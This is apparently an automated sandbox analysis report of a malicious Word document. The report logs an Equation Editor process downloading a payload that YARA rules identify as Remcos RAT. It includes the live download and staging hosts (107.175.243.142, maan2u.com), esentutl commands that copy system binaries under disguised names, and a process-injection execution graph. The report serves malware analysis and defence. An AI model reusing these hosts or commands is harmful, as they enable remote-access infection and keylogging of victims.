                                        Sep 25, 2024 09:43:28.394597054 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:28.394666910 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:28.396964073 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:28.396981001 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:29.321372986 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:29.321458101 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:29.327892065 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:29.327908993 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:29.328275919 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:29.442873955 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:29.483412027 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:29.925702095 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.143400908 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.143469095 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:30.159578085 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.159590006 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.159625053 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.159641027 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.159653902 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.159697056 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:30.159727097 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.159758091 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:30.159771919 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:30.161362886 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.161371946 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.161400080 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.161420107 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:30.161448956 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.161459923 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.161469936 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:30.161493063 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:30.175925970 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:30.175988913 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:30.392971992 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.392983913 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.393007994 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.393083096 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:30.393117905 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:30.393148899 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.726110935 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.726119041 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.726567984 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.726598978 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.726618052 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.726632118 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.726645947 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.726655006 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.726655006 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.726680994 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.727423906 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.727444887 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.727495909 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.727503061 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.727515936 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.728146076 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.728171110 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.728195906 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.728204012 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.728228092 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.728228092 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.728254080 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.728275061 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.728283882 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.728292942 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.728312016 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.729311943 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.729336023 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.729373932 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.729387999 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.729398012 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.730097055 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.730117083 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.730148077 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.730155945 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.730165958 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.731009007 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.731034040 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.731060982 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.731069088 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.731077909 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.731085062 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.731127024 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.731136084 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.731151104 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.731188059 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.759232998 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.762161016 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.762175083 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.762198925 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.762204885 CEST44349165112.137.173.77192.168.2.22
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Sep 25, 2024 09:43:28.313214064 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 25, 2024 09:43:28.319729090 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
                                        Sep 25, 2024 09:43:28.375128031 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 25, 2024 09:43:28.382281065 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                                        Sep 25, 2024 09:43:28.386998892 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
                                        Sep 25, 2024 09:43:28.393954039 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Sep 25, 2024 09:43:28.313214064 CEST | 192.168.2.22 | 8.8.8.8 | 0x8f30 | Standard query (0) | maan2u.com | A (IP address) | IN (0x0001) | false
                                        Sep 25, 2024 09:43:28.375128031 CEST | 192.168.2.22 | 8.8.8.8 | 0xe638 | Standard query (0) | maan2u.com | A (IP address) | IN (0x0001) | false
                                        Sep 25, 2024 09:43:28.386998892 CEST | 192.168.2.22 | 8.8.8.8 | 0x2225 | Standard query (0) | maan2u.com | A (IP address) | IN (0x0001) | false

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Sep 25, 2024 09:43:28.319729090 CEST | 8.8.8.8 | 192.168.2.22 | 0x8f30 | No error (0) | maan2u.com |  | 112.137.173.77 | A (IP address) | IN (0x0001) | false
                                        Sep 25, 2024 09:43:28.382281065 CEST | 8.8.8.8 | 192.168.2.22 | 0xe638 | No error (0) | maan2u.com |  | 112.137.173.77 | A (IP address) | IN (0x0001) | false
                                        Sep 25, 2024 09:43:28.393954039 CEST | 8.8.8.8 | 192.168.2.22 | 0x2225 | No error (0) | maan2u.com |  | 112.137.173.77 | A (IP address) | IN (0x0001) | false
                                        • maan2u.com
                                        • 107.175.243.142
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.22 | 49163 | 107.175.243.142 | 80 | 3620 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 25, 2024 09:43:25.859515905 CEST | 317 | OUT | GET /340/audiodg.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 107.175.243.142
                                        Connection: Keep-Alive
                                        Sep 25, 2024 09:43:26.396387100 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        Date: Wed, 25 Sep 2024 07:43:26 GMT
                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                        Last-Modified: Wed, 25 Sep 2024 00:08:41 GMT
                                        ETag: "109c00-622e66ca7c781"
                                        Accept-Ranges: bytes
                                        Content-Length: 1088512
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/lnk


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.22 | 49165 | 112.137.173.77 | 443 | 3780 | C:\Users\user\AppData\Roaming\audiodg.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-09-25 07:43:29 UTC | 163 | OUT | GET /doc/233_Qzzgbhhaaml HTTP/1.1
                                        Connection: Keep-Alive
                                        Accept: */*
                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                        Host: maan2u.com
                                        2024-09-25 07:43:29 UTC | 365 | IN | HTTP/1.1 200 OK
                                        Connection: close
                                        last-modified: Tue, 24 Sep 2024 23:56:18 GMT
                                        accept-ranges: bytes
                                        content-length: 1117948
                                        date: Wed, 25 Sep 2024 07:43:29 GMT
                                        server: LiteSpeed
                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"



                                        Target ID:0
                                        Start time:03:43:17
                                        Start date:25/09/2024
                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                        Imagebase:0x13f160000
                                        File size:1'423'704 bytes
                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:2
                                        Start time:03:43:22
                                        Start date:25/09/2024
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543'304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:03:43:27
                                        Start date:25/09/2024
                                        Path:C:\Users\user\AppData\Roaming\audiodg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\audiodg.exe"
                                        Imagebase:0x400000
                                        File size:1'088'512 bytes
                                        MD5 hash:BBF710C83246092A538128620853D4FD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 32%, ReversingLabs
                                        Reputation:low
                                        Has exited:true

                                        Target ID:6
                                        Start time:03:43:33
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" "
                                        Imagebase:0x4a9e0000
                                        File size:302'592 bytes
                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:03:43:33
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                        Imagebase:0x970000
                                        File size:123'392 bytes
                                        MD5 hash:D2DB315B866148D6AAA9E0B3AB31B011
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:9
                                        Start time:03:43:34
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                        Imagebase:0x740000
                                        File size:123'392 bytes
                                        MD5 hash:D2DB315B866148D6AAA9E0B3AB31B011
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:10
                                        Start time:03:43:35
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Roaming\audiodg.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /o
                                        Imagebase:0xd80000
                                        File size:123'392 bytes
                                        MD5 hash:D2DB315B866148D6AAA9E0B3AB31B011
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:12
                                        Start time:03:43:35
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\SndVol.exe
                                        Imagebase:0x860000
                                        File size:314'368 bytes
                                        MD5 hash:2305BFF2966D73694972FD7531BC5BAA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:16
                                        Start time:03:43:49
                                        Start date:25/09/2024
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543'304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:17
                                        Start time:03:43:55
                                        Start date:25/09/2024
                                        Path:C:\Users\Public\Libraries\Qzzgbhha.PIF
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\Libraries\Qzzgbhha.PIF"
                                        Imagebase:0x400000
                                        File size:1'088'512 bytes
                                        MD5 hash:BBF710C83246092A538128620853D4FD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 32%, ReversingLabs
                                        Reputation:low
                                        Has exited:true

                                        Target ID:19
                                        Start time:03:43:57
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\SndVol.exe
                                        Imagebase:0x850000
                                        File size:314'368 bytes
                                        MD5 hash:2305BFF2966D73694972FD7531BC5BAA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.380237258.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, Offset: 008DF000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8df000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4bc3465f06097e2d85310d8cccd422bbcf6bf31ba1a447da5ddd2855208061ec
                                          • Instruction ID: 1575fda312c13c985c8979291fee6b6945da2478829d54d51fffd4002a407eea
                                          • Opcode Fuzzy Hash: 4bc3465f06097e2d85310d8cccd422bbcf6bf31ba1a447da5ddd2855208061ec
                                          • Instruction Fuzzy Hash: FA42246244E7C19FC7078B3488B9490BFB0BE2321070E86DFC4D58F5A3E759A94AD766

                                          Execution Graph

                                          Execution Coverage:7.2%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:92.3%
                                          Total number of Nodes:1182
                                          Total number of Limit Nodes:9
4 API calls 28422->28423 28433 2d6616f 28423->28433 28426 2d589d0 4 API calls 28424->28426 28427 2d589d0 4 API calls 28425->28427 28428 2d6795d 28426->28428 28430 2d6848c 28427->28430 28889 2d585bc GetModuleHandleA GetProcAddress 28428->28889 28431 2d589d0 4 API calls 28430->28431 28432 2d68508 28431->28432 28435 2d6851d 28432->28435 28440 2d693a1 28432->28440 28434 2d589d0 4 API calls 28433->28434 28442 2d6623c 28434->28442 28438 2d6853e 28435->28438 28436 2d67986 28437 2d589d0 4 API calls 28436->28437 28445 2d67a02 28437->28445 28439 2d68575 28438->28439 28443 2d589d0 4 API calls 28439->28443 28441 2d589d0 4 API calls 28440->28441 28450 2d6941d 28441->28450 28444 2d589d0 4 API calls 28442->28444 28447 2d68599 28443->28447 28451 2d662b8 28444->28451 28446 2d589d0 4 API calls 28445->28446 28456 2d67a7e 28446->28456 28448 2d685d2 28447->28448 28449 2d68609 28448->28449 28452 2d589d0 4 API calls 28449->28452 28453 2d589d0 4 API calls 28450->28453 28454 2d589d0 4 API calls 28451->28454 28455 2d68615 28452->28455 28460 2d69499 28453->28460 28461 2d66334 28454->28461 28458 2d68641 28455->28458 28457 2d589d0 4 API calls 28456->28457 28467 2d67afa 28457->28467 28459 2d68678 28458->28459 28462 2d589d0 4 API calls 28459->28462 28463 2d589d0 4 API calls 28460->28463 28464 2d589d0 4 API calls 28461->28464 28465 2d68691 28462->28465 28478 2d69515 28463->28478 28471 2d663b0 28464->28471 28466 2d686bd 28465->28466 28469 2d686e0 28466->28469 28468 2d589d0 4 API calls 28467->28468 28480 2d67b9d 28468->28480 28470 2d6876e 28469->28470 28473 2d686f2 28469->28473 28475 2d6878f 28470->28475 28472 2d589d0 4 API calls 28471->28472 28486 2d6642c 28472->28486 28477 2d6871e 28473->28477 28474 2d69cf5 28476 2d589d0 4 API calls 28474->28476 28483 2d687a7 28475->28483 28489 2d69d71 28476->28489 28481 2d68755 28477->28481 28478->28474 28479 2d589d0 4 API calls 28478->28479 28492 2d695bb 28479->28492 28482 2d589d0 4 API calls 28480->28482 28484 2d589d0 4 API calls 28481->28484 28495 2d67c19 
28482->28495 28485 2d589d0 4 API calls 28483->28485 28484->28470 28488 2d687ea 28485->28488 28487 2d589d0 4 API calls 28486->28487 28491 2d664a8 28487->28491 28497 2d68823 28488->28497 28490 2d589d0 4 API calls 28489->28490 28500 2d69ded 28490->28500 28888 2d585bc GetModuleHandleA GetProcAddress 28491->28888 28493 2d589d0 4 API calls 28492->28493 28502 2d69637 28493->28502 28496 2d589d0 4 API calls 28495->28496 28507 2d67c95 28496->28507 28498 2d589d0 4 API calls 28497->28498 28499 2d68866 28498->28499 28511 2d688b9 28499->28511 28501 2d589d0 4 API calls 28500->28501 28506 2d69e69 28501->28506 28504 2d589d0 4 API calls 28502->28504 28503 2d664e6 28505 2d589d0 4 API calls 28503->28505 28522 2d696b3 28504->28522 28516 2d66562 28505->28516 28508 2d589d0 4 API calls 28506->28508 28509 2d589d0 4 API calls 28507->28509 28510 2d69e9c 28508->28510 28519 2d67d30 28509->28519 28512 2d589d0 4 API calls 28510->28512 28513 2d589d0 4 API calls 28511->28513 28515 2d69ecf 28512->28515 28514 2d68914 28513->28514 28524 2d68935 28514->28524 28518 2d589d0 4 API calls 28515->28518 28517 2d589d0 4 API calls 28516->28517 28527 2d665de 28517->28527 28520 2d69f02 28518->28520 28521 2d589d0 4 API calls 28519->28521 28523 2d589d0 4 API calls 28520->28523 28529 2d67dac 28521->28529 28525 2d589d0 4 API calls 28522->28525 28531 2d69f35 28523->28531 28526 2d589d0 4 API calls 28524->28526 28533 2d6978a 28525->28533 28535 2d68990 28526->28535 28528 2d589d0 4 API calls 28527->28528 28539 2d6665a 28528->28539 28530 2d589d0 4 API calls 28529->28530 28546 2d67e28 28530->28546 28532 2d589d0 4 API calls 28531->28532 28541 2d69fb1 28532->28541 28534 2d589d0 4 API calls 28533->28534 28543 2d69806 28534->28543 28536 2d589d0 4 API calls 28535->28536 28537 2d68a0c 28536->28537 28834 2d5d164 28537->28834 28540 2d589d0 4 API calls 28539->28540 28552 2d666d6 28540->28552 28542 2d589d0 4 API calls 28541->28542 28556 2d6a02d 28542->28556 28544 2d589d0 4 API calls 28543->28544 28614 2d69aa9 28543->28614 28559 
2d69894 28544->28559 28545 2d589d0 4 API calls 28558 2d69b6b 28545->28558 28548 2d589d0 4 API calls 28546->28548 28547 2d68a20 28549 2d589d0 4 API calls 28547->28549 28550 2d67ee5 28548->28550 28562 2d68aa1 28549->28562 28890 2d57e50 GetModuleHandleA GetProcAddress 28550->28890 28551 2d668db 28555 2d589d0 4 API calls 28551->28555 28552->28551 28553 2d589d0 4 API calls 28552->28553 28569 2d66767 28553->28569 28567 2d669c5 28555->28567 28557 2d589d0 4 API calls 28556->28557 28561 2d6a0a9 28557->28561 28560 2d589d0 4 API calls 28558->28560 28563 2d589d0 4 API calls 28559->28563 28576 2d69be7 28560->28576 28565 2d589d0 4 API calls 28561->28565 28564 2d589d0 4 API calls 28562->28564 28575 2d69910 28563->28575 28577 2d68b1d 28564->28577 28568 2d6a0dc 28565->28568 28566 2d67f08 28570 2d589d0 4 API calls 28566->28570 28571 2d589d0 4 API calls 28567->28571 28573 2d589d0 4 API calls 28568->28573 28572 2d589d0 4 API calls 28569->28572 28587 2d67f84 28570->28587 28588 2d66a41 28571->28588 28586 2d667e3 28572->28586 28574 2d6a10f 28573->28574 28580 2d589d0 4 API calls 28574->28580 28578 2d589d0 4 API calls 28575->28578 28579 2d589d0 4 API calls 28576->28579 28581 2d589d0 4 API calls 28577->28581 28599 2d6998c 28578->28599 28594 2d69c63 28579->28594 28583 2d6a142 28580->28583 28582 2d68b99 28581->28582 28596 2d68bb9 28582->28596 28882 2d58730 28582->28882 28585 2d589d0 4 API calls 28583->28585 28592 2d6a175 28585->28592 28590 2d589d0 4 API calls 28586->28590 28591 2d589d0 4 API calls 28587->28591 28589 2d589d0 4 API calls 28588->28589 28604 2d66abd 28589->28604 28602 2d6685f 28590->28602 28603 2d68000 28591->28603 28593 2d589d0 4 API calls 28592->28593 28608 2d6a1a8 28593->28608 28595 2d589d0 4 API calls 28594->28595 28597 2d69cdf 28595->28597 28598 2d589d0 4 API calls 28596->28598 28896 2d58d70 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28597->28896 28610 2d68c35 28598->28610 28601 2d589d0 4 API calls 28599->28601 28612 
2d69a2d 28601->28612 28605 2d589d0 4 API calls 28602->28605 28606 2d589d0 4 API calls 28603->28606 28607 2d589d0 4 API calls 28604->28607 28605->28551 28615 2d6807c 28606->28615 28616 2d66b39 28607->28616 28609 2d589d0 4 API calls 28608->28609 28622 2d6a224 28609->28622 28611 2d589d0 4 API calls 28610->28611 28624 2d68cb1 28611->28624 28613 2d589d0 4 API calls 28612->28613 28613->28614 28614->28545 28617 2d589d0 4 API calls 28615->28617 28618 2d589d0 4 API calls 28616->28618 28619 2d680f8 28617->28619 28628 2d66bb5 28618->28628 28891 2d5b118 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28619->28891 28621 2d68109 28621->27729 28623 2d589d0 4 API calls 28622->28623 28626 2d6a2a0 28623->28626 28625 2d589d0 4 API calls 28624->28625 28630 2d68d2d 28625->28630 28627 2d589d0 4 API calls 28626->28627 28631 2d6a2d3 28627->28631 28629 2d589d0 4 API calls 28628->28629 28634 2d66c31 28629->28634 28632 2d589d0 4 API calls 28630->28632 28633 2d589d0 4 API calls 28631->28633 28636 2d68db4 28632->28636 28637 2d6a34f 28633->28637 28635 2d589d0 4 API calls 28634->28635 28640 2d66cad 28635->28640 28638 2d589d0 4 API calls 28636->28638 28639 2d589d0 4 API calls 28637->28639 28642 2d68e30 28638->28642 28643 2d6a3cb 28639->28643 28641 2d589d0 4 API calls 28640->28641 28651 2d66d48 28641->28651 28644 2d589d0 4 API calls 28642->28644 28645 2d589d0 4 API calls 28643->28645 28650 2d68eac 28644->28650 28646 2d6a447 28645->28646 28647 2d589d0 4 API calls 28646->28647 28648 2d6a47a 28647->28648 28649 2d589d0 4 API calls 28648->28649 28653 2d6a4ad 28649->28653 28652 2d589d0 4 API calls 28650->28652 28655 2d589d0 4 API calls 28651->28655 28658 2d68f33 28652->28658 28654 2d589d0 4 API calls 28653->28654 28656 2d6a4e0 28654->28656 28660 2d66e43 28655->28660 28657 2d589d0 4 API calls 28656->28657 28662 2d6a513 28657->28662 28659 2d589d0 4 API calls 28658->28659 28664 2d68faf 28659->28664 28661 2d589d0 4 API calls 28660->28661 28668 2d66ebf 
